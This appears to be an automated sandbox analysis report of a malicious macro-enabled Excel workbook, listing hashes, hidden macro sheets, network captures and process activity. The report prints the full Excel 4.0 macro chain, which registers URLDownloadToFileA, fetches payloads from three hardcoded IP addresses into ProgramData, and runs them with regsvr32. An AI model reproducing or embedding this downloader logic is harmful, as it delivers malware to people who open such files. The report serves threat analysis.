                                                                                                                                                  SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                                                  Entropy (8bit):7.964362195636817
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                                                                                                                  • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                                                                                                  • ZIP compressed archive (8000/1) 5.73%
                                                                                                                                                  File name:Summary-133608431-Feb-15.xlsb
                                                                                                                                                  File size:270134
                                                                                                                                                  MD5:0df7cebeecf0768966fdeb34957e4903
                                                                                                                                                  SHA1:3390ca486aaa46814ff6759296304ed033243799
                                                                                                                                                  SHA256:1f320ea67a6fa753b536d33c190b5c9a4e8d02c58767860adff70b6c24b99f13
                                                                                                                                                  SHA512:5309cfa4610f09f786606ef3cceb1427f7a5399d24fceef3f6bf04ca42f1c37b83521a5a7d3de5bcf52583d0da660c452ee20ce4ef85532d710d04d6cbfd6867
                                                                                                                                                  SSDEEP:6144:9VafQTxwGF4p24e6RoPmj6M7R6SFENKq4Wneb:DacxGgF62PFNJnq
                                                                                                                                                  File Content Preview:PK..........!.........=.......[Content_Types].xml ...(.........................................................................................................................................................................................................
                                                                                                                                                  Icon Hash:74f0d0d2c6d6d0f4
                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1
                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:
                                                                                                                                                  Name:Tiposa1111
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa11114False0Falsepre21,5,=EXEC("regsvr32 C:\ProgramData\Hroser2.ocx")23,5,=GOTO(Tiposa11111!E10)
                                                                                                                                                  Name:Tiposa
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa3False0Falsepre1,1,adfvga5eyaey4,9,345434,12,435,2,uiytnkkb65sisk5,9,75,14,436,14,367,0,ug7,1,strysrtyy8,1,yystrystry8,9,348,10,59,1,strstr9,16,34610,7,kd658d6imiyi10,8,34510,9,u11,2,srtusrt11,7,dkkkkt11,11,511,12,3512,1,srttatu12,2,srtuus12,9,r6713,1,ry13,2,yusruysrtuy13,7,65f8d6k8s13,10,713,14,3413,15,54314,0,uh14,1,tshhfthrs15,0,715,4,URLDownloadTo15,7,ycifyiy,fi15,10,ae4616,2,ru6u17,9,dt17,10,617,12,u17,13,518,8,yu18,10,sb18,14,519,3,JJCCBB19,7,tyinz20,0,720,1,tsyshary20,4,185.141.26.236/20,7,aerf644yvac5y20,8,u21,0,md21,3,121,4,185.252.215.41/21,9,s21,11,m22,1,rh22,3,922,4,188.165.62.32/22,8,623,4,423,11,423,15,4624,4,524,6,=GOTO(Vtreytr!F17)24,8,2324,14,624,15,4325,1,bysrthshtd25,4,625,10,2325,13,526,1,dghgfh28,2,hdhstys37,6,=GOTO(Tiposa1!G8)
                                                                                                                                                  Name:Tiposa3
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa34False0Falsepre14,7,=GOTO(Detr!K18)
                                                                                                                                                  Name:Tiposa6
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa64False0Falsepre19,7,=GOTO(Tiposa2!H20)
                                                                                                                                                  Name:Detr
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Detr4False0Falsepost25,10,=GOTO(Xwtrd!G18)
                                                                                                                                                  Name:Detr
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Detr4False0Falsepre25,10,=GOTO(Xwtrd!G18)
                                                                                                                                                  Name:Tiposa2
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa24False0Falsepre14,7,=GOTO(Tiposa6!H10)21,7,=GOTO(Tiposa1!G21)28,7,=GOTO(Tiposa1!G29)
                                                                                                                                                  Name:Vtreytr
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Vtreytr4False0Falsepost21,5,=REGISTER("uRlMon",Fola&"FileA","JJCCBB","Drwrgdfghfhf",,"1","9")24,5,=GOTO(Tiposa!G34)
                                                                                                                                                  Name:Vtreytr
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Vtreytr4False0Falsepre21,5,=REGISTER("uRlMon",Fola&"FileA","JJCCBB","Drwrgdfghfhf",,"1","9")24,5,=GOTO(Tiposa!G34)
                                                                                                                                                  Name:Xwtrd2
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrd23False0Falsepost16,5,=Drwrgdfghfhf(0,"http://188.165.62.32/4864943733141980.dat","C:\ProgramData\Hroser3.ocx",0,0)19,5,=GOTO(Xwtrd!G24)
                                                                                                                                                  Name:Xwtrdferyy
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrdferyy3False0Falsepre13,3,=Drwrgdfghfhf(0,"http://185.252.215.41/7332413132139490.dat","C:\ProgramData\Hroser2.ocx",0,0)16,3,=GOTO(Xwtrd2!F14)
                                                                                                                                                  Name:Tiposa11111
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa111114False0Falsepre11,4,=EXEC("regsvr32 C:\ProgramData\Hroser3.ocx")13,4,=GOTO(Tiposa1!G25)
                                                                                                                                                  Name:Tiposa11111
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa111114False0Falsepost11,4,=EXEC("regsvr32 C:\ProgramData\Hroser3.ocx")13,4,=GOTO(Tiposa1!G25)
                                                                                                                                                  Name:Xwtrd
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrd3False0Falsepost20,6,=Drwrgdfghfhf(0,"http://185.141.26.236/4864943733141980.dat","C:\ProgramData\Hroser1.ocx",0,0)21,6,=GOTO(Xwtrdferyy!D11)25,6,=GOTO(Tiposa2!H13)
                                                                                                                                                  Name:Xwtrd
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrd3False0Falsepre20,6,=Drwrgdfghfhf(0,"http://185.141.26.236/7332413132139490.dat","C:\ProgramData\Hroser1.ocx",0,0)21,6,=GOTO(Xwtrdferyy!D11)25,6,=GOTO(Tiposa2!H13)
                                                                                                                                                  Name:Tiposa3
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa34False0Falsepost14,7,=GOTO(Detr!K18)
                                                                                                                                                  Name:Tiposa1
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa14False0Falsepost10,6,=RANDBETWEEN(213214234,9776980793567560)13,4,="C:\ProgramDat"18,4,=T(E20&E21)18,6,=GOTO(Tiposa3!H8)19,4,re20,4,gs21,6,=EXEC(E19&"vr32  "&E14&"a\Hroser1.ocx")22,6,=GOTO(Tiposa1111!F20)25,6,=GOTO(Tiposa2!H24)29,6,=RETURN()
                                                                                                                                                  Name:Tiposa
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa3False0Falsepost1,1,adfvga5eyaey4,9,345434,12,435,2,uiytnkkb65sisk5,9,75,14,436,14,367,0,ug7,1,strysrtyy8,1,yystrystry8,9,348,10,59,1,strstr9,16,34610,7,kd658d6imiyi10,8,34510,9,u11,2,srtusrt11,7,dkkkkt11,11,511,12,3512,1,srttatu12,2,srtuus12,9,r6713,1,ry13,2,yusruysrtuy13,7,65f8d6k8s13,10,713,14,3413,15,54314,0,uh14,1,tshhfthrs15,0,715,4,URLDownloadTo15,7,ycifyiy,fi15,10,ae4616,2,ru6u17,9,dt17,10,617,12,u17,13,518,8,yu18,10,sb18,14,519,3,JJCCBB19,7,tyinz20,0,720,1,tsyshary20,4,185.141.26.236/20,7,aerf644yvac5y20,8,u21,0,md21,3,121,4,185.252.215.41/21,9,s21,11,m22,1,rh22,3,922,4,188.165.62.32/22,8,623,4,423,11,423,15,4624,4,524,6,=GOTO(Vtreytr!F17)24,8,2324,14,624,15,4325,1,bysrthshtd25,4,625,10,2325,13,526,1,dghgfh28,2,hdhstys37,6,=GOTO(Tiposa1!G8)
                                                                                                                                                  Name:Tiposa6
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa64False0Falsepost19,7,=GOTO(Tiposa2!H20)
                                                                                                                                                  Name:Xwtrd2
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrd23False0Falsepre16,5,=Drwrgdfghfhf(0,"http://188.165.62.32/7332413132139490.dat","C:\ProgramData\Hroser3.ocx",0,0)19,5,=GOTO(Xwtrd!G24)
                                                                                                                                                  Name:Tiposa2
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa24False0Falsepost14,7,=GOTO(Tiposa6!H10)21,7,=GOTO(Tiposa1!G21)28,7,=GOTO(Tiposa1!G29)
                                                                                                                                                  Name:Xwtrdferyy
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrdferyy3False0Falsepost13,3,=Drwrgdfghfhf(0,"http://185.252.215.41/4864943733141980.dat","C:\ProgramData\Hroser2.ocx",0,0)16,3,=GOTO(Xwtrd2!F14)
                                                                                                                                                  Name:Tiposa1
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa14False0Falsepre10,6,=RANDBETWEEN(213214234,9776980793567560)13,4,="C:\ProgramDat"18,4,=T(E20&E21)18,6,=GOTO(Tiposa3!H8)19,4,re20,4,gs21,6,=EXEC(E19&"vr32  "&E14&"a\Hroser1.ocx")22,6,=GOTO(Tiposa1111!F20)25,6,=GOTO(Tiposa2!H24)29,6,=RETURN()
                                                                                                                                                  Name:Tiposa1111
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa11114False0Falsepost21,5,=EXEC("regsvr32 C:\ProgramData\Hroser2.ocx")23,5,=GOTO(Tiposa11111!E10)
                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  02/16/22-09:14:15.102382TCP1201ATTACK-RESPONSES 403 Forbidden8049165185.141.26.236192.168.2.22
                                                                                                                                                  02/16/22-09:14:15.273390TCP1201ATTACK-RESPONSES 403 Forbidden8049166185.252.215.41192.168.2.22
                                                                                                                                                  02/16/22-09:14:15.525809TCP1201ATTACK-RESPONSES 403 Forbidden8049167188.165.62.32192.168.2.22
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Feb 16, 2022 09:20:18.537472963 CET4974980192.168.2.5185.141.26.236
                                                                                                                                                  Feb 16, 2022 09:20:18.576657057 CET8049749185.141.26.236192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:20:18.578324080 CET4974980192.168.2.5185.141.26.236
                                                                                                                                                  Feb 16, 2022 09:20:18.578883886 CET4974980192.168.2.5185.141.26.236
                                                                                                                                                  Feb 16, 2022 09:20:18.618069887 CET8049749185.141.26.236192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:20:18.803147078 CET8049749185.141.26.236192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:20:18.803236008 CET4974980192.168.2.5185.141.26.236
                                                                                                                                                  Feb 16, 2022 09:20:18.810010910 CET4975080192.168.2.5185.252.215.41
                                                                                                                                                  Feb 16, 2022 09:20:18.832655907 CET8049750185.252.215.41192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:20:18.833250999 CET4975080192.168.2.5185.252.215.41
                                                                                                                                                  Feb 16, 2022 09:20:18.833889008 CET4975080192.168.2.5185.252.215.41
                                                                                                                                                  Feb 16, 2022 09:20:18.856023073 CET8049750185.252.215.41192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:20:18.958986998 CET8049750185.252.215.41192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:20:18.959069967 CET4975080192.168.2.5185.252.215.41
                                                                                                                                                  Feb 16, 2022 09:20:18.965893984 CET4975380192.168.2.5188.165.62.32
                                                                                                                                                  Feb 16, 2022 09:20:18.993029118 CET8049753188.165.62.32192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:20:18.993175983 CET4975380192.168.2.5188.165.62.32
                                                                                                                                                  Feb 16, 2022 09:20:18.993702888 CET4975380192.168.2.5188.165.62.32
                                                                                                                                                  Feb 16, 2022 09:20:19.020592928 CET8049753188.165.62.32192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:20:19.159185886 CET8049753188.165.62.32192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:20:19.159301043 CET4975380192.168.2.5188.165.62.32
                                                                                                                                                  Feb 16, 2022 09:21:23.826293945 CET8049749185.141.26.236192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:21:23.829256058 CET4974980192.168.2.5185.141.26.236
                                                                                                                                                  Feb 16, 2022 09:21:23.977355003 CET8049750185.252.215.41192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:21:23.978102922 CET4975080192.168.2.5185.252.215.41
                                                                                                                                                  Feb 16, 2022 09:21:24.168397903 CET8049753188.165.62.32192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:21:24.168525934 CET4975380192.168.2.5188.165.62.32
                                                                                                                                                  Feb 16, 2022 09:22:01.209593058 CET4975380192.168.2.5188.165.62.32
                                                                                                                                                  Feb 16, 2022 09:22:01.209835052 CET4975080192.168.2.5185.252.215.41
                                                                                                                                                  Feb 16, 2022 09:22:01.211003065 CET4974980192.168.2.5185.141.26.236
                                                                                                                                                  Feb 16, 2022 09:22:01.232399940 CET8049750185.252.215.41192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:22:01.236677885 CET8049753188.165.62.32192.168.2.5
                                                                                                                                                  Feb 16, 2022 09:22:01.250382900 CET8049749185.141.26.236192.168.2.5
                                                                                                                                                  • 185.141.26.236
                                                                                                                                                  • 185.252.215.41
                                                                                                                                                  • 188.165.62.32
                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.549749185.141.26.23680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 16, 2022 09:20:18.578883886 CET1126OUTGET /4864943733141980.dat HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 185.141.26.236
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 16, 2022 09:20:18.803147078 CET1127INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Wed, 16 Feb 2022 08:20:18 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.549750185.252.215.4180C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 16, 2022 09:20:18.833889008 CET1128OUTGET /4864943733141980.dat HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 185.252.215.41
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 16, 2022 09:20:18.958986998 CET1168INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Wed, 16 Feb 2022 08:20:18 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.549753188.165.62.3280C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 16, 2022 09:20:18.993702888 CET1170OUTGET /4864943733141980.dat HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 188.165.62.32
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 16, 2022 09:20:19.159185886 CET1229INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Wed, 16 Feb 2022 08:20:19 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:09:20:09
                                                                                                                                                  Start date:16/02/2022
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                  Imagebase:0x9d0000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:09:20:18
                                                                                                                                                  Start date:16/02/2022
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 C:\ProgramData\Hroser1.ocx
